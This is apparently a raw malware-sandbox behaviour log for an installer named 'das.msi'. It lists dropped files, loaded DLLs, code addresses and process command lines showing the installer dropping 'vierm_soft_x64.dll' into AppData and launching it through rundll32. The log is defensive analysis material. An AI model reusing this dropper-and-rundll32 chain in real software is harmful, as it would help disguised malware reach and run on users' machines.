Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9E30.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9EBE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9EEE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F0E.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{68C54E68-8D6C-454F-B2BE-2596868E8867}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F7C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA029.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI9E30.tmp

Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F36A50	4_2_00F36A50
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F6F032	4_2_00F6F032
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5C2CA	4_2_00F5C2CA
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F692A9	4_2_00F692A9
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5E270	4_2_00F5E270
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F684BD	4_2_00F684BD
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5A587	4_2_00F5A587
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F6D8D5	4_2_00F6D8D5
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F3C870	4_2_00F3C870
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F54920	4_2_00F54920
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5A915	4_2_00F5A915
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F60A48	4_2_00F60A48
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F39CC0	4_2_00F39CC0
Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F65D6D	4_2_00F65D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180055C62	6_2_0000000180055C62
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180041FEC	6_2_0000000180041FEC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CFF8	6_2_000000018001CFF8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003203C	6_2_000000018003203C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180020044	6_2_0000000180020044
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004C060	6_2_000000018004C060
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E080	6_2_000000018001E080
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180033088	6_2_0000000180033088
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F0D0	6_2_000000018001F0D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D104	6_2_000000018001D104
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002C168	6_2_000000018002C168
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180021188	6_2_0000000180021188
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180024198	6_2_0000000180024198
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800221A0	6_2_00000001800221A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800251B0	6_2_00000001800251B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800231B8	6_2_00000001800231B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F1D8	6_2_000000018001F1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E1D8	6_2_000000018001E1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D260	6_2_000000018001D260
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E2E0	6_2_000000018001E2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F2E0	6_2_000000018001F2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003430C	6_2_000000018003430C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D364	6_2_000000018001D364
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180031388	6_2_0000000180031388
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002238C	6_2_000000018002238C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002539C	6_2_000000018002539C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800233A0	6_2_00000001800233A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800123AC	6_2_00000001800123AC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800213B4	6_2_00000001800213B4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800243C4	6_2_00000001800243C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E3E8	6_2_000000018001E3E8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002E400	6_2_000000018002E400
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180032408	6_2_0000000180032408
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F448	6_2_000000018001F448
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D490	6_2_000000018001D490
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004249C	6_2_000000018004249C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E4F0	6_2_000000018001E4F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002C4F8	6_2_000000018002C4F8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C500	6_2_000000018001C500
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004C510	6_2_000000018004C510
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F550	6_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002E554	6_2_000000018002E554
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003356C	6_2_000000018003356C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002358C	6_2_000000018002358C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D598	6_2_000000018001D598
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002159C	6_2_000000018002159C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800245AC	6_2_00000001800245AC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800225BC	6_2_00000001800225BC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800255CC	6_2_00000001800255CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C608	6_2_000000018001C608
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B620	6_2_000000018002B620
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F658	6_2_000000018001F658
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E65C	6_2_000000018001E65C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D6A0	6_2_000000018001D6A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002E6D0	6_2_000000018002E6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C710	6_2_000000018001C710
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F760	6_2_000000018001F760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180021784	6_2_0000000180021784
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180024794	6_2_0000000180024794
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E7A0	6_2_000000018001E7A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800227A8	6_2_00000001800227A8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D7A8	6_2_000000018001D7A8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800317BC	6_2_00000001800317BC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800237BC	6_2_00000001800237BC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800327EC	6_2_00000001800327EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C81C	6_2_000000018001C81C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004A838	6_2_000000018004A838
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F8B8	6_2_000000018001F8B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001E8E4	6_2_000000018001E8E4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001D900	6_2_000000018001D900
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002C904	6_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001C978	6_2_000000018001C978
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180022990	6_2_0000000180022990
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800239A8	6_2_00000001800239A8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800219B0	6_2_00000001800219B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B9B4	6_2_000000018002B9B4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800249C0	6_2_00000001800249C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001F9C0	6_2_000000018001F9C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DA08	6_2_000000018001DA08
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EA28	6_2_000000018001EA28
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180033A3C	6_2_0000000180033A3C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CA80	6_2_000000018001CA80
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001FAC8	6_2_000000018001FAC8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DB10	6_2_000000018001DB10
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EB58	6_2_000000018001EB58
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CB88	6_2_000000018001CB88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180023B94	6_2_0000000180023B94
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180021B98	6_2_0000000180021B98
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180024BA8	6_2_0000000180024BA8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180032BB8	6_2_0000000180032BB8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180022BBC	6_2_0000000180022BBC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001FBD0	6_2_000000018001FBD0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180042BFC	6_2_0000000180042BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180031C08	6_2_0000000180031C08
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DC18	6_2_000000018001DC18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EC60	6_2_000000018001EC60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CC90	6_2_000000018001CC90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180046CAC	6_2_0000000180046CAC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001FD28	6_2_000000018001FD28
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001ED68	6_2_000000018001ED68
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DD70	6_2_000000018001DD70
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180021D84	6_2_0000000180021D84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180024D94	6_2_0000000180024D94
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180022DA4	6_2_0000000180022DA4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180023DC4	6_2_0000000180023DC4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002BDDC	6_2_000000018002BDDC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CDE8	6_2_000000018001CDE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001FE30	6_2_000000018001FE30
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EE70	6_2_000000018001EE70
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DE74	6_2_000000018001DE74
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180033E98	6_2_0000000180033E98
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001CEF0	6_2_000000018001CEF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180044F38	6_2_0000000180044F38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001FF38	6_2_000000018001FF38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001DF78	6_2_000000018001DF78
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180022F8C	6_2_0000000180022F8C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180020FA0	6_2_0000000180020FA0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180023FB0	6_2_0000000180023FB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180021FB4	6_2_0000000180021FB4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180024FC4	6_2_0000000180024FC4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001EFC8	6_2_000000018001EFC8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000016AD27929EE	6_2_0000016AD27929EE
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000016AD27931BE	6_2_0000016AD27931BE
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000273F807BE	6_2_0000000273F807BE
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000273F7FFEE	6_2_0000000273F7FFEE
Source: C:\Windows\explorer.exe	Code function: 9_2_00F302E0	9_2_00F302E0
Source: C:\Windows\explorer.exe	Code function: 9_2_00F302A8	9_2_00F302A8
Source: C:\Windows\explorer.exe	Code function: 9_2_00F21A8C	9_2_00F21A8C
Source: C:\Windows\explorer.exe	Code function: 9_2_00F21A7C	9_2_00F21A7C
Source: C:\Windows\explorer.exe	Code function: 9_2_00F303E8	9_2_00F303E8
Source: C:\Windows\explorer.exe	Code function: 9_2_00F303C8	9_2_00F303C8
Source: C:\Windows\explorer.exe	Code function: 9_2_00F301A0	9_2_00F301A0
Source: C:\Windows\explorer.exe	Code function: 9_2_00F22164	9_2_00F22164
Source: C:\Windows\explorer.exe	Code function: 9_2_00F30328	9_2_00F30328

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018004816C appears 44 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180001400 appears 56 times
Source: C:\Windows\Installer\MSIA029.tmp	Code function: String function: 00F53292 appears 70 times
Source: C:\Windows\Installer\MSIA029.tmp	Code function: String function: 00F53790 appears 39 times
Source: C:\Windows\Installer\MSIA029.tmp	Code function: String function: 00F5325F appears 103 times

Source: das.msi	Binary or memory string: OriginalFilenameviewer.exeF vs das.msi
Source: das.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs das.msi

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA029.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA029.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA029.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA029.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSIA029.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior

Source: vierm_soft_x64.dll.2.dr	Static PE information: section name: memcpy_
Source: vierm_soft_x64.dll.2.dr	Static PE information: section name: _RDATA

Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F5323C push ecx; ret	4_2_00F5324F
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000016AD27A00D8 push cs; retf	6_3_0000016AD27A00FD
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2EE21 push rsi; ret	9_2_00F2EE27
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2F5BA push rcx; ret	9_2_00F2F5BC
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2EF4F push D5912897h; iretq	9_2_00F2EF57

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9F0E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9EBE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9EEE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9E30.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA029.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
